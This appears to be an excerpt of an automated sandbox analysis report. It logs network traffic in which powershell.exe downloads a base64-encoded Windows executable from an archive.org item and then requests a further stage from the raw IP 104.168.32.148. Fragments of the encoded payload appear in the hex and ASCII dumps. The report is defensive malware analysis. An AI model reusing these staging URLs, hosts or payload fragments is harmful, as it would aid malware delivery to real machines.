                                                          Oct 2, 2024 05:30:42.622251034 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.622395039 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.622436047 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.622586012 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.637079954 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.637104988 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.637187004 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.637228966 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.637274981 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.638050079 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.638063908 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.638120890 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.638130903 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.638179064 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.641266108 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.641283035 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.641346931 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.641360998 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.641400099 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.642225981 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.642246008 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.642313004 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.642323017 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.642359972 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.665816069 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.665838957 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.665961027 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.665996075 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.666043997 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.759675980 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.759730101 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.759913921 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.759913921 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.759958982 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.760019064 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.760966063 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.761009932 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.761035919 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.761045933 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.761068106 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.761087894 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.761982918 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762022018 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762053013 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.762059927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762075901 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.762095928 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.762897015 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762933969 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762968063 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.762974024 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.763021946 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.763920069 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.763958931 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.763989925 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.763998032 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.764009953 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.764038086 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.764898062 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.764931917 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.764975071 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.764982939 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.764997005 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.765021086 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.765841961 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.765861988 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.765911102 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.765921116 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.765954971 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.766531944 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.766546965 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.766593933 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.766604900 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.766644955 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.846174955 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.846230984 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.846349001 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.846405983 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.846426010 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.846453905 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.847253084 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.847287893 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.847321033 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.847347021 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.847368956 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.847392082 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848073006 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848110914 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848140955 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848153114 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848175049 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848193884 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848840952 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848871946 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848902941 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848915100 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848939896 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848961115 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.894660950 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.894691944 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.894896984 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.894937992 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.894983053 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.895600080 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.895621061 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.895667076 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.895679951 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.895714998 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.896495104 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.896511078 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.896558046 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.896570921 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.896608114 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.897638083 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.897653103 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.897722960 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.897733927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.897767067 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.962896109 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.962932110 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963130951 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.963171005 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963222027 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.963764906 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963782072 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963819027 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.963830948 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963850975 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.963867903 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.964529037 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.964543104 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.964576960 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.964587927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.964608908 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.964622974 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.965610981 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.965626955 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.965672970 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.965682983 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.965699911 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.965713978 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.030827999 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.030859947 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031008959 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.031044006 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031186104 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.031697989 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031716108 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031769991 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.031780958 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031816959 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.032337904 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.032354116 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.032391071 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.032399893 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.032423019 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.032438040 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.033633947 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.033649921 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.033698082 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.033710003 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.033726931 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.033746004 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099143028 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099210024 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099256992 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099297047 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099315882 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099344015 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099812031 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099858999 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099895954 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099905014 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099929094 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099951029 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.100601912 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.100646973 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.100681067 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.100687981 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.100718021 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.100733042 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.101696968 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.101737022 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.101758003 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.101768017 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.101794958 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.101819992 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.140880108 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.140957117 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.141002893 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.141047001 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.141067028 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.141087055 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.167488098 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.167587042 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.167620897 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.167666912 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.167684078 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.167726994 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.170521975 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.255940914 CEST4973180192.168.2.4104.168.32.148
                                                          Oct 2, 2024 05:30:43.260996103 CEST8049731104.168.32.148192.168.2.4
                                                          Oct 2, 2024 05:30:43.261172056 CEST4973180192.168.2.4104.168.32.148
                                                          Oct 2, 2024 05:30:43.261233091 CEST4973180192.168.2.4104.168.32.148
                                                          Oct 2, 2024 05:30:43.266458988 CEST8049731104.168.32.148192.168.2.4
                                                          Oct 2, 2024 05:30:43.731539965 CEST8049731104.168.32.148192.168.2.4
                                                          Oct 2, 2024 05:30:43.772026062 CEST4973180192.168.2.4104.168.32.148
                                                          Oct 2, 2024 05:30:43.904550076 CEST4973180192.168.2.4104.168.32.148

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 2, 2024 05:30:39.254654884 CEST5288253192.168.2.41.1.1.1
                                                          Oct 2, 2024 05:30:39.404122114 CEST53528821.1.1.1192.168.2.4
                                                          Oct 2, 2024 05:30:56.528856993 CEST53505031.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 2, 2024 05:30:39.254654884 CEST192.168.2.41.1.1.10x9eb1Standard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 2, 2024 05:30:39.404122114 CEST1.1.1.1192.168.2.40x9eb1No error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • ia600100.us.archive.org
                                                          • 104.168.32.148

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449731104.168.32.148807768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 2, 2024 05:30:43.261233091 CEST78OUTGET /345/CHPPZA.txt HTTP/1.1
                                                          Host: 104.168.32.148
                                                          Connection: Keep-Alive
                                                          Oct 2, 2024 05:30:43.731539965 CEST541INHTTP/1.1 404 Not Found
                                                          Date: Wed, 02 Oct 2024 03:30:44 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                          Content-Length: 300
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 34 2e 31 36 38 2e 33 32 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 104.168.32.148 Port 80</address></body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449730207.241.227.2404437768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-02 03:30:40 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                          Host: ia600100.us.archive.org
                                                          Connection: Keep-Alive
                                                          2024-10-02 03:30:40 UTC606INHTTP/1.1 200 OK
                                                          Server: nginx/1.24.0 (Ubuntu)
                                                          Date: Wed, 02 Oct 2024 03:30:40 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 2823512
                                                          Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                          Connection: close
                                                          ETag: "66e22cba-2b1558"
                                                          Strict-Transport-Security: max-age=15724800
                                                          Expires: Wed, 02 Oct 2024 09:30:40 GMT
                                                          Cache-Control: max-age=21600
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                          Access-Control-Allow-Credentials: true
                                                          Accept-Ranges: bytes
                                                          2024-10-02 03:30:40 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                          Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                          Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
